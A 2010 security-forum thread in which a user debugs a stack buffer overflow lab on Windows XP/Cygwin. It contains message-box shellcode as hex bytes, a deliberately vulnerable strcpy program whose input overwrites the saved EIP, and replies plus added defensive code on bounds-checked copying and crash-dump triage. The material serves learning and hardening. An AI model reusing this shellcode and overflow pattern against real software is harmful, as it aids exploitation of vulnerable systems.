Security Forums

[Win XP Pro SP3/Cygwin] Payload/shellcode not executing

draggy
Posted: Mon Sep 06, 2010 7:16 am    Post subject: [Win XP Pro SP3/Cygwin] Payload/shellcode not executing

Hello people,

The payload/shellcode that resides in my array won't execute, or hangs, after the saved EIP on the stack was overwritten with the array address.

Here is my payload, which typically displays a message box:

msgbox.c:

Code:

#include <stdio.h>
#include <string.h>   /* strlen() */

/* Payload bytes as posted (the message-box test payload). */
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
                   "\x51\x68\x6c\x6c\x20\x20\x68\x33"
                   "\x32\x2e\x64\x68\x75\x73\x65\x72"
                   "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
                   "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
                   "\xc1\x11\x11\x11\x11\x51\x68\x61"
                   "\x67\x65\x42\x68\x4d\x65\x73\x73"
                   "\x89\xe1\x51\x50\xbb\x40\xae\x80"
                   "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
                   "\x51\x51\x52\xff\xd0\x31\xc0\x50"
                   "\xb8\x12\xcb\x81\x7c\xff\xd0";

int main(void)
{
    /* Treat the byte array as a function and jump into it. */
    int (*func)(void) = (int (*)(void)) shellcode;

    printf("Shellcode Length is : %u\n", (unsigned) strlen(shellcode));
    printf("Shellcode sizeof is : %u\n", (unsigned) sizeof(shellcode));

    func();

    return 0;
}


Here is the problem:

vul.c:

Code:

#include <stdio.h>
#include <stdlib.h>
#include <io.h>
#include <string.h>

/* 87 payload bytes, then the saved-EBP filler, then the new return address.
   All pieces are one concatenated string literal (no ';' until the end). */
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
                   "\x51\x68\x6c\x6c\x20\x20\x68\x33"
                   "\x32\x2e\x64\x68\x75\x73\x65\x72"
                   "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"
                   "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
                   "\xc1\x11\x11\x11\x11\x51\x68\x61"
                   "\x67\x65\x42\x68\x4d\x65\x73\x73"
                   "\x89\xe1\x51\x50\xbb\x40\xae\x80"
                   "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
                   "\x51\x51\x52\xff\xd0\x31\xc0\x50"
                   "\xb8\x12\xcb\x81\x7c\xff\xd0"    /* end of payload */
                   "BBBB"                            /* overwrite saved EBP */
                   "\xd1\xcc\x22\x00";               /* overwrite saved EIP with function2()'s c array address */

void function2(void)
{
    char c[87];

    printf("Address c = %p and value = %x\n", (void *) (&c[0]), c[0]);

    /* Unbounded copy: 87 payload bytes + "BBBB" + 4 address bytes + NUL overrun c[]. */
    strcpy(c, shellcode);
}

int main(void)
{
    printf("function 2 address = %p\n", (void *) (function2));

    function2();

    return 0;
}


and the undesired output:

Code:

$ uname -a
CYGWIN_NT-5.1 changeme 1.7.7(0.230/5/3) 2010-08-31 09:58 i686 Cygwin

$ ./vul
function 2 address = 0x4011a0
Address c = 0x22ccd1 and value = 1d
Segmentation fault (core dumped)

$ cat vul.exe.stackdump
Exception: STATUS_ACCESS_VIOLATION at eip=0022CCF3
eax=7E410000 ebx=7C801D7B ecx=7C801BFA edx=00240608 esi=00000000 edi=0022CE64
ebp=42424242 esp=0022CD20 program=C:\exploit\vul\vul.exe, pid 924, thread main
cs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023
Stack trace:
Frame     Function  Args
      3 [main] vul 924 exception::handle: Error while dumping state (probably corrupted stack)


Is Data Execution Prevention (DEP) on Windows XP Pro SP3 preventing the payload from executing after the EIP has been overwritten with function2()'s "c" array address in the Cygwin environment?
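Added here as an example (it is not code from the thread or from any poster): the hardened counterpart of vul.c's function2(). The local buffer keeps the same 87-byte size, but the unbounded strcpy() is replaced by a copy that is limited by the destination size and reports an oversized input instead of running past the saved EBP and return address that sit just above c[] on the stack. The names copy_bounded, function2_hardened and try_len are this example's own, and the input is a constructed run of 'A' bytes standing in for whatever arrives from outside. One caveat the original code hides: strcpy() also copies the terminating NUL, so even the 87-byte payload on its own already overruns char c[87] by one byte.

```c
#include <stdio.h>
#include <string.h>

#define LOCAL_BUF 87   /* same size as c[] in vul.c */

/* Copy srclen bytes of src into dst and NUL-terminate it. Returns 0 on
 * success, -1 (and an empty dst) when the input would not fit. Unlike
 * strcpy(), the caller's buffer size is the limit, not the input length. */
int copy_bounded(char *dst, size_t dstsz, const char *src, size_t srclen)
{
    if (dstsz == 0)
        return -1;
    if (srclen >= dstsz) {          /* no room for the bytes plus the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, srclen);
    dst[srclen] = '\0';
    return 0;
}

/* Hardened counterpart of vul.c's function2(): same 87-byte local buffer,
 * but an oversized input is rejected instead of overwriting the saved EBP
 * and return address that follow c[] on the stack. */
int function2_hardened(const char *input, size_t len)
{
    char c[LOCAL_BUF];

    if (copy_bounded(c, sizeof c, input, len) != 0) {
        fprintf(stderr, "rejected %lu-byte input: c[] holds at most %lu bytes plus NUL\n",
                (unsigned long) len, (unsigned long) (sizeof c - 1));
        return -1;
    }
    printf("accepted %lu bytes: \"%.8s...\"\n", (unsigned long) len, c);
    return 0;
}

/* Feed a constructed input of n 'A' bytes (a stand-in for any external
 * data) through function2_hardened(); returns its result. */
int try_len(size_t n)
{
    char input[256];

    if (n >= sizeof input)
        return -1;
    memset(input, 'A', n);
    input[n] = '\0';
    return function2_hardened(input, n);
}

int main(void)
{
    try_len(86);   /* fits: 86 bytes + NUL == sizeof c           -> accepted */
    try_len(87);   /* the posted payload alone: 87 + NUL > 87     -> rejected */
    try_len(95);   /* payload + "BBBB" + return address (vul.c)   -> rejected */
    return 0;
}
```

The 95-byte case is the layout vul.c writes (87 + 4 + 4); the hardened function refuses it at the copy, so the saved EBP and EIP slots are never reached.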
draggy
Posted: Mon Sep 06, 2010 5:59 pm

Update:

Turning DEP off and on doesn't help in this situation.

I found that when I overwrite the saved EIP with the address of the global variable "shellcode", the payload/shellcode executes completely.

I wonder why it was not working when I overwrote the saved EIP with the address of function2's local variable "c".

Thanks
alt.don
Posted: Mon Sep 06, 2010 10:41 pm

Hello draggy,

There are many variables at play here which could have affected one lab test over another. I would suggest you write exactly what your lab environment was and we can then help troubleshoot it somewhat better.

--Don
Fire Ant
Posted: Tue Sep 07, 2010 9:16 am

draggy,

Did you check out the error message? It seems you have overwritten EBX rather than EIP.

eip=0022CCF3
ebp=42424242

Fire Ant
draggy
Posted: Tue Sep 07, 2010 11:20 am

Hello Don and Fireant,

Thank you for replying and coming to my aid :)

Hello Don,

The program was developed and tested in a virtual machine environment (VMware x86 -> 32 bits), Cygwin v1.7.7 under Windows XP Pro SP3. By the way, AVG (anti-virus) is installed.

Hello Fireant,

ebp=42424242 == "\x42\x42\x42\x42" == "BBBB", right? (ASCII table)

eip=0022CCF3 -> "\xd1\xcc\x22\x00" == 0022CCD1 -> 0022CCF3 - 0022CCD1 = 0x22 (34 bytes in decimal)

This means the shellcode executed for 33/34 bytes from 0x0022CCD1 (function2's local "c" array address), then stopped and dumped core.

Thanks
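As an added crash-triage check (written for this page, not by any poster), the following C program parses the register lines of the vul.exe.stackdump quoted in the first post and relates them to the c[] range printed by vul (address 0x22ccd1, char c[87]). It reproduces draggy's arithmetic (eip is 34 bytes into c[]) and draws the two conclusions an analyst takes from such a dump: the faulting instruction was fetched from inside a stack buffer, so DEP did not block execution for this process (had it been enforced, the fault would have landed on the very first byte, eip=0022CCD1, not 34 bytes in); and esp also lies inside c[] at the moment of the fault, so the bytes being executed were simultaneously in use as live stack, which is why execution stopped partway rather than not at all. The dump lines are embedded as constructed input; the names dump_lines, parse_regs, triage, dump_flags and dump_eip_offset are this example's own.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Register lines copied from the vul.exe.stackdump quoted in the thread,
 * embedded here as constructed input so the program runs offline. */
static const char *const dump_lines[] = {
    "Exception: STATUS_ACCESS_VIOLATION at eip=0022CCF3",
    "eax=7E410000 ebx=7C801D7B ecx=7C801BFA edx=00240608 esi=00000000 edi=0022CE64",
    "ebp=42424242 esp=0022CD20 program=C:\\exploit\\vul\\vul.exe, pid 924, thread main",
};
#define NDUMP (sizeof dump_lines / sizeof dump_lines[0])

/* c[] address and size as printed by vul in the thread: 0x22ccd1, char c[87]. */
#define C_ADDR 0x22ccd1u
#define C_LEN  87u

struct regs { uint32_t eip, ebp, esp; };

/* Parse one "name=HEX" token out of a line; returns 1 on success. */
static int grab(const char *line, const char *key, uint32_t *out)
{
    const char *p = strstr(line, key);
    unsigned v;

    if (p == NULL || sscanf(p + strlen(key), "%x", &v) != 1)
        return 0;
    *out = v;
    return 1;
}

/* Collect eip/ebp/esp from the dump; returns 1 only if all three were found. */
int parse_regs(const char *const *lines, size_t n, struct regs *r)
{
    int seen = 0;

    for (size_t i = 0; i < n; i++) {
        if (grab(lines[i], "eip=", &r->eip)) seen |= 1;
        if (grab(lines[i], "ebp=", &r->ebp)) seen |= 2;
        if (grab(lines[i], "esp=", &r->esp)) seen |= 4;
    }
    return seen == 7;
}

struct verdict {
    int  eip_in_buf;    /* faulting instruction was fetched from inside c[] */
    long eip_offset;    /* its distance from the start of c[] */
    int  esp_in_buf;    /* the live stack pointer also lies inside c[] */
    int  ebp_filler;    /* saved EBP came back as the "BBBB" filler */
};

/* Relate the crash registers to a known stack buffer [buf, buf + len). */
struct verdict triage(const struct regs *r, uint32_t buf, uint32_t len)
{
    struct verdict v;

    v.eip_in_buf = r->eip >= buf && r->eip < buf + len;
    v.eip_offset = (long) r->eip - (long) buf;
    v.esp_in_buf = r->esp >= buf && r->esp < buf + len;
    v.ebp_filler = r->ebp == 0x42424242u;
    return v;
}

/* Parse the embedded dump and triage it against c[]. Returns -1 if the
 * registers could not be found, otherwise a bitmask:
 * 1 = eip inside c[], 2 = esp inside c[], 4 = saved EBP is the filler. */
int dump_flags(void)
{
    struct regs r;

    if (!parse_regs(dump_lines, NDUMP, &r))
        return -1;
    struct verdict v = triage(&r, C_ADDR, C_LEN);
    return (v.eip_in_buf ? 1 : 0) | (v.esp_in_buf ? 2 : 0) | (v.ebp_filler ? 4 : 0);
}

/* Offset of the faulting eip from the start of c[] (LONG_MIN-free: -1 on failure). */
long dump_eip_offset(void)
{
    struct regs r;

    if (!parse_regs(dump_lines, NDUMP, &r))
        return -1;
    return triage(&r, C_ADDR, C_LEN).eip_offset;
}

int main(void)
{
    int flags = dump_flags();

    if (flags < 0) {
        fputs("could not find eip/ebp/esp in dump\n", stderr);
        return 1;
    }
    printf("eip is %ld bytes into c[]%s\n", dump_eip_offset(),
           (flags & 1) ? ": code was fetched from a stack buffer, DEP did not stop it" : "");
    if (flags & 2)
        puts("esp is inside c[]: the executed bytes were live stack at the time of the fault");
    if (flags & 4)
        puts("ebp == 'BBBB': the saved frame pointer was overwritten by the copy");
    return 0;
}
```

On Windows XP SP2/SP3 the default DEP policy is OptIn, which covers only Windows system programs and services, so a user-built vul.exe is not protected unless the policy is changed or the binary opts in; that matches the dump, where execution clearly began from the stack page.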